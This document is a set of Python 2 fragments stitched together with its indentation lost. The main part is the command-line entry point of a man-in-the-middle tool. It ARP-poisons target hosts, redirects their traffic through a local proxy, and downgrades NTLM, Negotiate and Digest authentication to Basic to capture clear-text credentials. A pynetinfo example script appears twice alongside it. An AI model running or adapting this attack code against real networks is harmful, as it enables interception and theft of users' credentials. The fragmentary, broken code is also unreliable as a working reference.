def __init__(self, interface):
self.iface = interface
distros = ['CentOS', 'Fedora']
if platform.linux_distribution()[0] in distros:
self.isfedora = True
else:
self.isfedora = False
if not self.iface == '':
print 'connected'
self.myip = self.get_myip(self.iface)
self.myhw = netinfo.get_hwaddr(self.iface)
self.gwip = self.get_gwip()
self.gwhw = self.get_gwhw()
self.netmask = '24'
else:
print self.iface, 'No active connection detected'
sys.exit()
print '##### ', self.generate_hw()
# www.sassan.me.uk
# pypi.python.org/pypi/pynetinfo/
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
import netinfo
for dev in netinfo.list_active_devs():
print "*********************************"
print dev
print "mac: " + netinfo.get_hwaddr(dev)
print "ip: " + netinfo.get_ip(dev)
print "netmask: " + netinfo.get_netmask(dev)
print "broadcast: " + netinfo.get_broadcast(dev)
print "######################################"
for route in netinfo.get_routes():
print route['dest'] + "/" + route['netmask'] + " -> " + route['gateway']
#netinfo.del_route("", "192.168.0.0", "164.11.222.253", "255.255.255.0");
def main():
parser = argparse.ArgumentParser(description="""
HTTP Authentication downgrade tool
----------------------------------
This tool is a man-in-the-middle utility intended to downgrade authentication requests it receives
to Basic in order to capture clear-text credentials. This is done by:
- ARP cache poisoning the target(s) to redirect their traffic to the attacker ;
- Starting a local HTTP proxy instance ;
- Redirecting the targets' connections to the specified ports to the local proxy ;
- Relaying HTTP/S traffic to and from clients ;
- Intercepting NTLM, Negotiate and Digest auth. requests from the remote web servers or proxy ;
- Rewriting the responses to request Basic authentication.
HTTPS will be intercepted if port 443 is specified, however clients may see certificate warnings.
Levels of attakcs from stealthiest to noisiest (different levels can be used simultaneously):
1. Downgrade authentication requests in 407 responses (most likely domain accounts)
2. Downgrade authentication requests in 401 responses (for web apps / intranets / ...)
3. Rewrite 200 responses to 401 to force authentication (very intrusive)
By default the tool will stop all attacks towards any given client after clear-text credentials have
been captured from this client. To continue attacking no matter what, this can be disabled with the
--nonstop option (very intrusive++).
Example usage: %s --iface eth0 --levels 1,2 192.168.1.0/24
""" % sys.argv[0], formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('target', metavar='<target>', action='store', help="Comma-sparated list of target IP addresses or CIDR networks")
parser.add_argument('--router', default=None, metavar='<router>', action='store', help="Local network gateway (default: autodetect)")
parser.add_argument('--iface', default='eth0', metavar='<iface>', action='store', help="Network interface card to use (default: eth0)")
parser.add_argument('--nofw', default=False, action='store_true', help="Do not auto-configure routing and iptables rules (default: false)")
parser.add_argument('--noarp', default=False, action='store_true', help="Do not ARP poison (default: false)")
parser.add_argument('--freq', default=5.0, metavar='<freq>', action='store', type=float, help="ARP poison packets frequency in seconds (default: 5)")
parser.add_argument('--ports', default='80', metavar='<ports>', action='store', help="Comma seperated list of ports to intercept (default: 80)")
parser.add_argument('--proxy', default=None, metavar='<proxy>', action='store', help="External proxy to forward clients' traffic to (format: ip:port)\n\n")
parser.add_argument('--nonstop', default=False, action='store_true', help="Continue attacking clients after capturing credentials (default: false) ")
parser.add_argument('--levels', default='1', metavar='<levels>', action='store', help="Comma separated list of attack levels. See above for description (default: 1)\n\n")
parser.add_argument('--verbose', default=False, action='store_true', help="Enable verbose output")
config.init()
config.cfg.args = parser.parse_args()
arp_threads = []
proxy_threads = []
try:
config.cfg.args.local_ip = netinfo.get_ip(config.cfg.args.iface)
except:
print "[!] Error: Interface %s not found" % config.cfg.args.iface
sys.exit(0)
for route in netinfo.get_routes():
if route['dest'] == '0.0.0.0':
config.cfg.args.router = route['gateway']
if config.cfg.args.router == None:
print "Error: could not detect default gateway"
sys.exit(0)
try:
config.cfg.args.levels = [int(x) for x in config.cfg.args.levels.split(',')]
except:
print "[!] Invalid level specified."
sys.exit()
# Using upstream proxy
if config.cfg.args.proxy is not None:
config.cfg.args.proxy = config.cfg.args.proxy.rstrip('/').replace('http://', '').replace('https://', '')
config.cfg.args.proxy = config.cfg.args.proxy.split(':')
try: config.cfg.args.proxy = (config.cfg.args.proxy[0], int(config.cfg.args.proxy[1]))
except: config.cfg.args.proxy = (config.cfg.args.proxy[0], 8080)
# Test upstream proxy connection
s = socket.socket()
try:
s.connect((config.cfg.args.proxy[0], config.cfg.args.proxy[1]))
s.close()
except Exception as e:
print "[!] Error: Unable to connect to proxy."
s.close()
sys.exit()
config.cfg.args.ip_list = []
for i in config.cfg.args.target.split(','):
if '/' in i:
net = netaddr.IPNetwork(i)
config.cfg.args.ip_list = config.cfg.args.ip_list + [str(x) for x in net if x not in [net.network, net.broadcast]]
else:
config.cfg.args.ip_list.append(i)
# Start proxy
for port in config.cfg.args.ports.split(","):
try:
port = int(port)
except:
print "Wrong port"
sys.exit()
print "[*] Starting proxy on %s:%d..." % (config.cfg.args.local_ip, port)
t = proxy.ProxyThread(config.cfg.args.local_ip, port)
proxy_threads.append(t)
t.start()
# Configure iptables
if config.cfg.args.nofw == False:
if os.getuid() != 0:
print "[!] Error: Must run as root to auto-configure routing and iptables rules"
sys.exit(0)
else:
conf_ip_forward()
config.cfg.my = (netinfo.get_ip(config.cfg.args.iface), netinfo.get_hwaddr(config.cfg.args.iface))
config.cfg.router = (config.cfg.args.router, '')
config.cfg.clients = {}
# Start ARP poison thread
if config.cfg.args.noarp == False:
scapy_conf.iface = config.cfg.args.iface
print "[*] Poisoning ARP caches..."
for addr in config.cfg.args.ip_list:
# exclude myself and router
if addr in [config.cfg.my[0], config.cfg.router[0]]:
continue
t = ArpPoisonThread(addr)
arp_threads.append(t)
t.start()
try:
while 1:
time.sleep(1)
except KeyboardInterrupt:
print "\r\nKilling ARP Poisoning threads..."
for t in arp_threads:
t.kill()
print "Killing Proxy threads..."
for t in proxy_threads:
t.server.shutdown()
clean_exit()
import netinfo
for dev in netinfo.list_active_devs():
print "*********************************"
print dev
print "mac: "+netinfo.get_hwaddr(dev)
print "ip: "+netinfo.get_ip(dev)
print "netmask: "+netinfo.get_netmask(dev)
print "broadcast: "+netinfo.get_broadcast(dev)
print "######################################"
for route in netinfo.get_routes():
print route['dest']+"/"+route['netmask']+" -> "+route['gateway']
#netinfo.del_route("", "192.168.0.0", "164.11.222.253", "255.255.255.0");
def getMacAddr():
interface = getDefaultGatewayInterfaceName()
return netinfo.get_hwaddr(interface)